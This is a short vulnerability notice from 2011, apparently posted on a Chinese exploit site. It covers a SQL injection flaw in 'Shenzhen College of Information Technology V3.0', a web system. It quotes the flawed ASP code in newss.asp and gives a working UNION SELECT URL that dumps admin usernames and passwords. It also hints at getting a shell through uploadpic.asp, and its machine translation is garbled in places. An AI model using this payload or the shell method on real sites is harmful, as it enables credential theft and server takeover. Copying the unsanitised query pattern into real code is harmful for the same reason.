Shenzhen College of Information Technology V3. 0 injection vulnerability-vulnerability warning-the black bar safety net

2011-02-04T00:00:00
ID MYHACK58:62201128983
Type myhack58
Reporter 佚名
Modified 2011-02-04T00:00:00

Description

Publishing author: xiaokis

Affected version: V3. 0

Vulnerability type: SQL injection Vulnerability description: File: the newss. asp

<% on error resume next sql="update news set hits=hits+1 where id="&cstr(request("id")) conn. execute sql set rs=server. createobject("adodb. recordset") sql="select * from news where id="&request("id") rs. open sql,conn,1,1 if rs. eof and rs. bof then response. write "<script>alert('sorry, the information does not exist, please return!'); window. close();</Script>" response. end else %> vulnerability confirmed: http://127.0.0.1/news/gb/newss.asp?id=105%20union%20select%201,2,3,username,5,password,7,8,9,1 0,1 1,1 2,1 3,1 4%20from%20admin

This system also has multiple injection is!

Into the background after a uploadpic. asp is the ray pool to get the SHELL methods, not testing